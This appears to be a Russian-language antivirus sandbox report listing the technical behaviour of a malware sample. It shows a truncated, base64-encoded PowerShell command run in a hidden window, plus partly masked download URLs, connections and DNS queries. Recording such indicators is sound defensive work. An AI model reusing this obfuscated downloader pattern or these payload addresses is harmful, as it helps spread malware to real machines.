Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFADMANwB6AGcAagBlAD0AKAAnAFQAJwArACcAMgA0ACcAKwAnADkAagB1AHgAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAFYAOgB0AEUAbQBQAFwAbwBGAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1508
- %TEMP%\833419.cvr
- 'ro####oundup.com':80
- 'ro####oundup.com':443
- 'ri##m.com':80
- 'ri##m.com':443
- 'ex###um.com.br':80
- 'sc####inepvc.com':80
- 'm3###lth.com':80
- 'm3###lth.com':443
- http://ro####oundup.com/css/98Y1F8/
- http://ri##m.com/wp-content/sW/
- http://ex###um.com.br/Folder_Lean_Jun/0/
- http://sc####inepvc.com/test/dDS/
- http://m3###lth.com/mt-content/UskDK/
- 'ro####oundup.com':443
- 'ri##m.com':443
- 'm3###lth.com':443
- DNS ASK av####oolvsa.zt.ua
- DNS ASK ro####oundup.com
- DNS ASK ri##m.com
- DNS ASK ro###otto.com
- DNS ASK ex###um.com.br
- DNS ASK sc####inepvc.com
- DNS ASK m3###lth.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFADMANwB6AGcAagBlAD0AKAAnAFQAJwArACcAMgA0ACcAKwAnADkAagB1AHgAJwApADsALgAoACcAbgBlAHcALQAnACsAJwBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAFYAOgB0AEUAbQBQAFwAbwBGAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG... (со скрытым окном)